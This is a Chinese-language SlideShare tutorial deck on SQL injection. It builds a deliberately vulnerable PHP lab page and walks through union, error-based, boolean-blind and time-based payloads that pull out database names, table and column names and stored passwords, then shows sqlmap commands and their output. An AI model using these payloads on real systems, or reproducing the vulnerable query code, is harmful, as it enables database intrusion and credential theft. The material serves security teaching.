SlideShare a Scribd company logo

Sql injection 幼幼班

hugo lu
hugo lu

透過簡單的攻擊範例,說明四種常見的 SQL Injection (Union Based Injection、Error Based Injection、Boolean Based Blind Injection、Time Based Blind Injection),並介紹一款常用的工具 sqlmap。

Engineering
1 of 36
Download to read offline
SQL Injection 幼幼班 Hugo 2016/5/3
Wiki 定義 • SQL攻擊(SQL injection),簡稱隱碼攻擊,是發⽣生 於應⽤用程式之資料庫層的安全漏洞。簡⽽而⾔言之,是在 輸⼊入的字串之中夾帶SQL指令,在設計不良的程式當 中忽略了檢查,那麼這些夾帶進去的指令就會被資料 庫伺服器誤認為是正常的SQL指令⽽而執⾏行,因此遭到 破壞或是⼊入侵。
⼀一個簡單的範例 • 登⼊入驗證的SQL查詢代碼 • strSQL = "SELECT * FROM users WHERE (name = '" + userName + "') and (pw = '"+ passWord +"');" • 惡意填⼊入 • userName = "1' OR '1'='1"; • passWord = "1' OR '1'='1"; • SQL查詢命令變成 • strSQL = "SELECT * FROM users WHERE (name = '1' OR '1'='1') and (pw = '1' OR '1'='1');" • strSQL = "SELECT * FROM users;" (result=true 無帳號密碼,亦可登⼊入網站)
SQL Injection Lab • 實驗步驟 • 設定被攻擊系統 • Union Based Injection • Error Based Injection • Boolean Based Blind Injection • Time Based Blind Injection • 使⽤用 sqlmap 分析弱點
設定被攻擊系統
新增資料庫 # mysql -uroot -pspy123 test < test.mysql # mysql -uroot -pspy123 test -e "show tables" +----------------+ | Tables_in_test | +----------------+ | fruit | | user | +----------------+ # mysql -uroot -pspy123 test -e "select * from fruit" +----+--------+ | ID | Name | +----+--------+ | 1 | apple | | 2 | banana | | 3 | cherry | | 4 | date | +----+--------+ # mysql -uroot -pspy123 test -e "select * from user" +----+------+------+ | ID | Name | Pass | +----+------+------+ | 1 | aaa | 111 | | 2 | bbb | 222 | | 3 | ccc | 333 | +----+------+------+
hackme.php (攻擊⺫⽬目標) <?php $id= $_GET["id"]; $link = mysql_connect('localhost', 'root', 'spy123'); if (!$link) die('Not connected : ' . mysql_error()); $db_selected = mysql_select_db('test', $link); if (!$db_selected) die ('Can't use foo : ' . mysql_error()); $db_query = "SELECT * FROM fruit WHERE ID='$id' LIMIT 0,1;"; echo $db_query . "<hr>"; $result = mysql_query($db_query); if (!$result) die('Invalid query: ' . mysql_error()); while ($row = mysql_fetch_assoc($result)) { echo "name: " . $row['Name'] . "<br>"; } mysql_free_result($result); ?>
⼩小試⾝身⼿手 • 正常查詢 (https://192.168.200.61/hackme.php?id=1) • Input: 1 • Query: SELECT * FROM Test WHERE ID='1' LIMIT 0,1; • Response: name: apple • 測試 input query 是否使⽤用單引號 (SELECT * FROM Test WHERE ID='1' LIMIT 0,1;) • input: 1 >> name: apple • input: 1' >> Invalid query: You have an error in your SQL syntax... • input: 1" >> name: apple • input: 1' or '1'='1 >> name: apple
Union Based Injection
技術描述 • 使⽤用 UNION 將另⼀一段 SELECT 指令加掛在正常輸⼊入 後⾯面,藉此窺探系統資訊。 • The attacker appends to the affected parameter a syntactically valid SQL statement starting with an UNION ALL SELECT.
推測表格欄位數⺫⽬目 • 原 SQL Query 指令 • $db_query = "SELECT * FROM fruit WHERE ID='$id' LIMIT 0,1;"; • SQL Injection 發現 fruit table 有兩個欄位 • $db_query = "SELECT * FROM fruit WHERE ID='1' union select 1, 2-- -LIMIT 0,1;"; 被註解掉
找出系統資訊 Target Input Response 資料庫名稱 -1' union select 1,database()-- - name: test 系統版本 -1' union select 1,version()-- - name: 5.5.33a-MariaDB 資料庫使⽤用者 -1' union select 1,user()-- - name: root@localhost SELECT * FROM fruit WHERE ID='-1' union select 1,version()-- -' LIMIT 0,1;
找出表格名稱 • Input • -1' union select 1,table_name from information_schema.tables where table_schema=database()--+ • SQL Query • SELECT * FROM fruit WHERE ID='-1' union select 1,table_name from information_schema.tables where table_schema=database()-- ' LIMIT 0,1; • Response • name: fruit • name: user
找出欄位名稱 • Input • -1' union Select 1,column_name from information_schema.columns where table_schema=database() and table_name='user'--+ • SQL Query • SELECT * FROM fruit WHERE ID='-1' union Select 1,column_name from information_schema.columns where table_schema=database() and table_name='user'-- ' LIMIT 0,1; • Response • name: ID • name: Name • name: Pass
找出表格資料 • Input • -1' union Select 1,concat(ID,", ",Name,", ",Pass) from user--+ • SQL Query • SELECT * FROM fruit WHERE ID='-1' union Select 1,concat(ID,", ",Name,", ",Pass) from user-- ' LIMIT 0,1; • Response • name: 1, aaa, 111 • name: 2, bbb, 222 • name: 3, ccc, 333
Error Based Injection
技術描述 • 傳遞不乾淨的輸⼊入引發資料庫錯誤,藉由產⽣生的錯誤 進⾏行窺探 • The attacker replaces or appends to the affected parameter a database-specific error message provoking statement and parses the HTTP response headers and body in search of DBMS error messages containing the injected pre-defined chain of characters and the subquery statement output within.
找出當前資料庫名稱 • Input • -1' and extractvalue(0x0a,concat(0x0a,(select database())))-- + • SQL Query • SELECT * FROM fruit WHERE ID='-1' and extractvalue(0x0a,concat(0x0a,(select database())))-- ' LIMIT 0,1; • Response • Invalid query: XPATH syntax error: ' test'
找出當前表格名稱 • Input • -1' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))--+ • SQL Query • SELECT * FROM fruit WHERE ID='-1' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))-- ' LIMIT 0,1; • Response • Invalid query: XPATH syntax error: ' fruit'
Boolean Based Blind Injection
技術描述 • 有時候系統沒有那麼多的漏洞,能讓你⽤用⽅方便的⽅方式得 到答案,只好跟被攻擊者玩 是/不是 (true/false) 的遊戲。 • 透過 substring(string_to_guess, N,1)=D 資料庫查詢指 令,猜測 string_to_guess 的第 N 個字元是否為 D (⼗十進 位表⽰示) • The attacker replaces or appends to the affected parameter in the HTTP request, a syntatically valid SQL statement string containing a SELECT sub-statement, or any other SQL statement whose the user want to retrieve the output.
猜測資料庫版本 • 猜測主版本為 4 • Input:1' and substring(version(),1,1)=4--+ • SQL Query:SELECT * FROM fruit WHERE ID='1' and substring(version(), 1,1)=4-- ' LIMIT 0,1; • Response:(沒輸出資料) • 猜測主版本為 5 • Input:1' and substring(version(),1,1)=5--+ • SQL Query: SELECT * FROM fruit WHERE ID='1' and substring(version(), 1,1)=5-- ' LIMIT 0,1; • Response:name: apple
猜測表格名稱 • Input • 1' and ascii(substring((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1), 1,1))>64--+ • SQL Query • SELECT * FROM fruit WHERE ID='1' and ascii(substring((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),1,1))>64-- ' LIMIT 0,1; • Steps • >64 (有反應); >112 (無反應); >95 (有反應); >110 (無反應); >103 (無反應); 
 >100 (有反應); >102 (無反應); >101 (有反應); =102 (有反應) • 表格第⼀一個字: “f" (⼗十進位=102),重複以上步驟猜出表格名稱: "fruit"
猜測欄位名稱 • 猜 fruit table 第⼀一個欄位名稱的字⺟母 • 1' and ascii(substring((select concat(column_name) from information_schema.columns where table_name="fruit" limit 0,1),1,1))=73--+ • 1' and ascii(substring((select concat(column_name) from information_schema.columns where table_name="fruit" limit 0,1),2,1))=68--+ • fruit 表格第⼀一個欄位名稱: "ID" (⼗十進位=73, 68)
猜測欄位資料 • 表格(fruit) 第⼆二筆資料 欄位 (Name) 的值 • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),1,1))=98--+ • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),2,1))=97--+ • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),3,1))=110--+ • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),4,1))=97--+ • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),5,1))=110--+ • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),6,1))=97--+ • 欄位值: “banana” (⼗十進位=98, 97, 100, 97, 110, 97)
Time Based Blind Injection
技術描述 • 更糟的情形是⺫⽬目標連 是/不是 (true/false) 的遊戲都不 跟你玩,只能透過延遲時間的⽅方式窺探系統資訊。 • Time-based techniques are often used to achieve tests when there is no other way to retrieve information from the database server. This kind of attack injects a SQL segment which contains specific DBMS function or heavy query that generates a time delay.
猜出 SQL Query 的⽅方式 • 註解⽅方式: --+ • SQL Query: SELECT * FROM fruit WHERE ID=‘1’
使⽤用 sqlmap 分析弱點
為什麼要⽤用 sqlmap • 攻擊者不知道 SQL Query 的⻑⾧長相 • 猜測系統漏洞通常耗時費⼒力
指令 • # sqlmap -u "https://192.168.200.61/hackme.php? id=1" --force-ssl --dbms=mysql -p id • -u "https://192.168.200.61/..." ,要攻擊的URL • --force-ssl ,強制使⽤用 SSL/HTTPS • --dbms=mysql ,強制後端 DBMS 種類 • -p id ,要測試的參數
Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 5529=5529 AND 'vZzG'='vZzG Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=1' AND (SELECT 9346 FROM(SELECT COUNT(*),CONCAT(0x71626a6a71,(SELECT (ELT(9346=9346,1))),0x71766b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eHGd'='eHGd Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))VcYN) AND 'yLgG'='yLgG Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x71626a6a71,0x78576371715058656452616346686d506c666643427a52514775 456778504d50744e504951505a54,0x71766b7871)-- -
以上實驗純屬虛構
 如有雷同純屬巧合
Magic Quotes 被關閉了 • 防⽌止 user 端送到 server 端的資料,會被惡意內容攻擊。 • 當 magic_quotes_gpc=on 時,$_GET、$_POST、$_COOKIE 等 等從 user 端來的資料,如果含有單引號、雙引號、反斜線等內 容,會⾃自動被加⼀一條反斜線在前⾯面,把該字元跳脫掉。 • echo.php <?php echo $_GET["input"]; ?> • HTTP GET https://192.168.200.61/echo.php?input=hugo's secret magic_quotes_gpc Response On hugo's secret Off hugo's secret
參考資料 • http://securityidiots.com/Web-Pentest/SQL-Injection • https://github.com/sqlmapproject/sqlmap/wiki/ Usage • http://php.net/manual/en/ security.magicquotes.disabling.php

Recommended

網站程式資安白箱與黑箱檢測處理經驗分享
網站程式資安白箱與黑箱檢測處理經驗分享網站程式資安白箱與黑箱檢測處理經驗分享
網站程式資安白箱與黑箱檢測處理經驗分享Ying-Chun Cheng
 
Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Orange Tsai
 
Strategies to design FUD malware
Strategies to design FUD malwareStrategies to design FUD malware
Strategies to design FUD malwarePedro Tavares
 
《保哥線上講堂》打造一個具有 Linux 溫度的 Windows 命令提示字元工具
《保哥線上講堂》打造一個具有 Linux 溫度的 Windows 命令提示字元工具《保哥線上講堂》打造一個具有 Linux 溫度的 Windows 命令提示字元工具
《保哥線上講堂》打造一個具有 Linux 溫度的 Windows 命令提示字元工具Will Huang
 
Fuzzing
FuzzingFuzzing
FuzzingKhalegh Salehi
 
台科大網路鑑識課程 封包分析及中繼站追蹤
台科大網路鑑識課程 封包分析及中繼站追蹤台科大網路鑑識課程 封包分析及中繼站追蹤
台科大網路鑑識課程 封包分析及中繼站追蹤jack51706
 
[CB19] アンチウイルスをオラクルとしたWindows Defenderに対する新しい攻撃手法 by 市川遼
[CB19] アンチウイルスをオラクルとしたWindows Defenderに対する新しい攻撃手法 by 市川遼 [CB19] アンチウイルスをオラクルとしたWindows Defenderに対する新しい攻撃手法 by 市川遼
[CB19] アンチウイルスをオラクルとしたWindows Defenderに対する新しい攻撃手法 by 市川遼 CODE BLUE
 
猫でもわかるかもしれない SQLインジェクション
猫でもわかるかもしれない SQLインジェクション猫でもわかるかもしれない SQLインジェクション
猫でもわかるかもしれない SQLインジェクションkinme modoki
 

Recommended

網站程式資安白箱與黑箱檢測處理經驗分享
網站程式資安白箱與黑箱檢測處理經驗分享網站程式資安白箱與黑箱檢測處理經驗分享
網站程式資安白箱與黑箱檢測處理經驗分享Ying-Chun Cheng
 
Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Orange Tsai
 
Strategies to design FUD malware
Strategies to design FUD malwareStrategies to design FUD malware
Strategies to design FUD malwarePedro Tavares
 
《保哥線上講堂》打造一個具有 Linux 溫度的 Windows 命令提示字元工具
《保哥線上講堂》打造一個具有 Linux 溫度的 Windows 命令提示字元工具《保哥線上講堂》打造一個具有 Linux 溫度的 Windows 命令提示字元工具
《保哥線上講堂》打造一個具有 Linux 溫度的 Windows 命令提示字元工具Will Huang
 
Fuzzing
FuzzingFuzzing
FuzzingKhalegh Salehi
 
台科大網路鑑識課程 封包分析及中繼站追蹤
台科大網路鑑識課程 封包分析及中繼站追蹤台科大網路鑑識課程 封包分析及中繼站追蹤
台科大網路鑑識課程 封包分析及中繼站追蹤jack51706
 
[CB19] アンチウイルスをオラクルとしたWindows Defenderに対する新しい攻撃手法 by 市川遼
[CB19] アンチウイルスをオラクルとしたWindows Defenderに対する新しい攻撃手法 by 市川遼 [CB19] アンチウイルスをオラクルとしたWindows Defenderに対する新しい攻撃手法 by 市川遼
[CB19] アンチウイルスをオラクルとしたWindows Defenderに対する新しい攻撃手法 by 市川遼 CODE BLUE
 
猫でもわかるかもしれない SQLインジェクション
猫でもわかるかもしれない SQLインジェクション猫でもわかるかもしれない SQLインジェクション
猫でもわかるかもしれない SQLインジェクションkinme modoki
 
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...CODE BLUE
 
Windows Operating System Archaeology
Windows Operating System ArchaeologyWindows Operating System Archaeology
Windows Operating System Archaeologyenigma0x3
 
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra滲透測試 Talk @ Nisra
滲透測試 Talk @ NisraOrange Tsai
 
密碼學漏洞與他們的產地 Crypto fail and where to find them
密碼學漏洞與他們的產地 Crypto fail and where to find them密碼學漏洞與他們的產地 Crypto fail and where to find them
密碼學漏洞與他們的產地 Crypto fail and where to find themJohn L Chen
 
OWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologies
OWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologiesOWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologies
OWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologiesOWASP
 
網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-Area網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-AreaOrange Tsai
 
たのしいPwn 公開用
たのしいPwn 公開用たのしいPwn 公開用
たのしいPwn 公開用uu ymd
 
Bypass_AV-EDR.pdf
Bypass_AV-EDR.pdfBypass_AV-EDR.pdf
Bypass_AV-EDR.pdfFarouk2nd
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightHostway|HOSTING
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpMindfire Solutions
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
Practical Windows Kernel Exploitation
Practical Windows Kernel ExploitationPractical Windows Kernel Exploitation
Practical Windows Kernel ExploitationzeroSteiner
 
應用 Azure Platform-as-a-Service & DevOps 打造彈性企業服務
應用 Azure Platform-as-a-Service & DevOps 打造彈性企業服務應用 Azure Platform-as-a-Service & DevOps 打造彈性企業服務
應用 Azure Platform-as-a-Service & DevOps 打造彈性企業服務Edward Kuo
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Nmap 9つの真実
Nmap 9つの真実Nmap 9つの真実
Nmap 9つの真実abend_cve_9999_0001
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
たのしいPowershell Empire
たのしいPowershell EmpireたのしいPowershell Empire
たのしいPowershell Empiremonochrojazz
 
Sql injection
Sql injectionSql injection
Sql injectionNuruzzaman Milon
 
PHP Object Injection入門
PHP Object Injection入門PHP Object Injection入門
PHP Object Injection入門Yu Iwama
 
WSO2 IoTS Device Manufacturer Guide
WSO2 IoTS Device Manufacturer GuideWSO2 IoTS Device Manufacturer Guide
WSO2 IoTS Device Manufacturer Guidehugo lu
 
Union based sql injection by Urdu Tutorials Point
Union based sql injection by Urdu Tutorials PointUnion based sql injection by Urdu Tutorials Point
Union based sql injection by Urdu Tutorials PointAl Zarqali
 

More Related Content

What's hot

PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...CODE BLUE
 
Windows Operating System Archaeology
Windows Operating System ArchaeologyWindows Operating System Archaeology
Windows Operating System Archaeologyenigma0x3
 
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra滲透測試 Talk @ Nisra
滲透測試 Talk @ NisraOrange Tsai
 
密碼學漏洞與他們的產地 Crypto fail and where to find them
密碼學漏洞與他們的產地 Crypto fail and where to find them密碼學漏洞與他們的產地 Crypto fail and where to find them
密碼學漏洞與他們的產地 Crypto fail and where to find themJohn L Chen
 
OWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologies
OWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologiesOWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologies
OWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologiesOWASP
 
網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-Area網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-AreaOrange Tsai
 
たのしいPwn 公開用
たのしいPwn 公開用たのしいPwn 公開用
たのしいPwn 公開用uu ymd
 
Bypass_AV-EDR.pdf
Bypass_AV-EDR.pdfBypass_AV-EDR.pdf
Bypass_AV-EDR.pdfFarouk2nd
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightHostway|HOSTING
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpMindfire Solutions
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
Practical Windows Kernel Exploitation
Practical Windows Kernel ExploitationPractical Windows Kernel Exploitation
Practical Windows Kernel ExploitationzeroSteiner
 
應用 Azure Platform-as-a-Service & DevOps 打造彈性企業服務
應用 Azure Platform-as-a-Service & DevOps 打造彈性企業服務應用 Azure Platform-as-a-Service & DevOps 打造彈性企業服務
應用 Azure Platform-as-a-Service & DevOps 打造彈性企業服務Edward Kuo
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
たのしいPowershell Empire
たのしいPowershell EmpireたのしいPowershell Empire
たのしいPowershell Empiremonochrojazz
 
PHP Object Injection入門
PHP Object Injection入門PHP Object Injection入門
PHP Object Injection入門Yu Iwama
 

What's hot (20)

PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
 
Windows Operating System Archaeology
Windows Operating System ArchaeologyWindows Operating System Archaeology
Windows Operating System Archaeology
 
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
 
密碼學漏洞與他們的產地 Crypto fail and where to find them
密碼學漏洞與他們的產地 Crypto fail and where to find them密碼學漏洞與他們的產地 Crypto fail and where to find them
密碼學漏洞與他們的產地 Crypto fail and where to find them
 
OWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologies
OWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologiesOWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologies
OWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologies
 
網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-Area網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-Area
 
たのしいPwn 公開用
たのしいPwn 公開用たのしいPwn 公開用
たのしいPwn 公開用
 
Bypass_AV-EDR.pdf
Bypass_AV-EDR.pdfBypass_AV-EDR.pdf
Bypass_AV-EDR.pdf
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with Phirelight
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads Up
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
 
Practical Windows Kernel Exploitation
Practical Windows Kernel ExploitationPractical Windows Kernel Exploitation
Practical Windows Kernel Exploitation
 
應用 Azure Platform-as-a-Service & DevOps 打造彈性企業服務
應用 Azure Platform-as-a-Service & DevOps 打造彈性企業服務應用 Azure Platform-as-a-Service & DevOps 打造彈性企業服務
應用 Azure Platform-as-a-Service & DevOps 打造彈性企業服務
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Nmap 9つの真実
Nmap 9つの真実Nmap 9つの真実
Nmap 9つの真実
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
たのしいPowershell Empire
たのしいPowershell EmpireたのしいPowershell Empire
たのしいPowershell Empire
 
Sql injection
Sql injectionSql injection
Sql injection
 
PHP Object Injection入門
PHP Object Injection入門PHP Object Injection入門
PHP Object Injection入門
 

Viewers also liked

WSO2 IoTS Device Manufacturer Guide
WSO2 IoTS Device Manufacturer GuideWSO2 IoTS Device Manufacturer Guide
WSO2 IoTS Device Manufacturer Guidehugo lu
 
Union based sql injection by Urdu Tutorials Point
Union based sql injection by Urdu Tutorials PointUnion based sql injection by Urdu Tutorials Point
Union based sql injection by Urdu Tutorials PointAl Zarqali
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi pptAhamed Saleem
 
Continuous integration
Continuous integrationContinuous integration
Continuous integrationhugo lu
 
Time-Based Blind SQL Injection
Time-Based Blind SQL InjectionTime-Based Blind SQL Injection
Time-Based Blind SQL Injectionmatt_presson
 
從模組到類別
從模組到類別從模組到類別
從模組到類別Justin Lin
 
流程語法與函式
流程語法與函式流程語法與函式
流程語法與函式Justin Lin
 
Dev ops 簡介
Dev ops 簡介Dev ops 簡介
Dev ops 簡介hugo lu
 
關於測試,我說的其實是......
關於測試,我說的其實是......關於測試,我說的其實是......
關於測試,我說的其實是......hugo lu
 
Python 起步走
Python 起步走Python 起步走
Python 起步走Justin Lin
 
The linux networking architecture
The linux networking architectureThe linux networking architecture
The linux networking architecturehugo lu
 
初學R語言的60分鐘
初學R語言的60分鐘初學R語言的60分鐘
初學R語言的60分鐘Chen-Pan Liao
 

Viewers also liked (20)

WSO2 IoTS Device Manufacturer Guide
WSO2 IoTS Device Manufacturer GuideWSO2 IoTS Device Manufacturer Guide
WSO2 IoTS Device Manufacturer Guide
 
Union based sql injection by Urdu Tutorials Point
Union based sql injection by Urdu Tutorials PointUnion based sql injection by Urdu Tutorials Point
Union based sql injection by Urdu Tutorials Point
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi ppt
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Continuous integration
Continuous integrationContinuous integration
Continuous integration
 
Time-Based Blind SQL Injection
Time-Based Blind SQL InjectionTime-Based Blind SQL Injection
Time-Based Blind SQL Injection
 
從模組到類別
從模組到類別從模組到類別
從模組到類別
 
流程語法與函式
流程語法與函式流程語法與函式
流程語法與函式
 
Dev ops 簡介
Dev ops 簡介Dev ops 簡介
Dev ops 簡介
 
關於測試,我說的其實是......
關於測試,我說的其實是......關於測試,我說的其實是......
關於測試,我說的其實是......
 
Python 起步走
Python 起步走Python 起步走
Python 起步走
 
The linux networking architecture
The linux networking architectureThe linux networking architecture
The linux networking architecture
 
初學R語言的60分鐘
初學R語言的60分鐘初學R語言的60分鐘
初學R語言的60分鐘
 
References
ReferencesReferences
References
 
Kernel Debugging & Profiling
Kernel Debugging & ProfilingKernel Debugging & Profiling
Kernel Debugging & Profiling
 
Block Drivers
Block DriversBlock Drivers
Block Drivers
 
Character Drivers
Character DriversCharacter Drivers
Character Drivers
 
File System Modules
File System ModulesFile System Modules
File System Modules
 
Network Drivers
Network DriversNetwork Drivers
Network Drivers
 
PCI Drivers
PCI DriversPCI Drivers
PCI Drivers
 

Similar to Sql injection 幼幼班

03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17Eoin Keary
 
SQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning CenterSQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning CenterMichael Coates
 
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL InjectionShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL InjectionChema Alonso
 
Hacking Your Way To Better Security
Hacking Your Way To Better SecurityHacking Your Way To Better Security
Hacking Your Way To Better SecurityColin O'Dell
 
Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016Colin O'Dell
 
Hacking Your Way To Better Security - Dutch PHP Conference 2016
Hacking Your Way To Better Security - Dutch PHP Conference 2016Hacking Your Way To Better Security - Dutch PHP Conference 2016
Hacking Your Way To Better Security - Dutch PHP Conference 2016Colin O'Dell
 
Protecting your data from SQL Injection attacks
Protecting your data from SQL Injection attacksProtecting your data from SQL Injection attacks
Protecting your data from SQL Injection attacksKevin Alcock
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASPMizno Kruge
 
[Kerference] Nefarious SQL - 김동호(KERT)
[Kerference] Nefarious SQL - 김동호(KERT)[Kerference] Nefarious SQL - 김동호(KERT)
[Kerference] Nefarious SQL - 김동호(KERT)NAVER D2
 
Advanced SQL Injection Attack & Defenses
Advanced SQL Injection Attack & DefensesAdvanced SQL Injection Attack & Defenses
Advanced SQL Injection Attack & DefensesTiago Mendo
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlChema Alonso
 
DEF CON 27 -OMER GULL - select code execution from using sq lite
DEF CON 27 -OMER GULL - select code execution from using sq liteDEF CON 27 -OMER GULL - select code execution from using sq lite
DEF CON 27 -OMER GULL - select code execution from using sq liteFelipe Prado
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injectionbadhanbd
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 

Similar to Sql injection 幼幼班 (20)

03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17
 
SQL Injection - Mozilla Security Learning Center
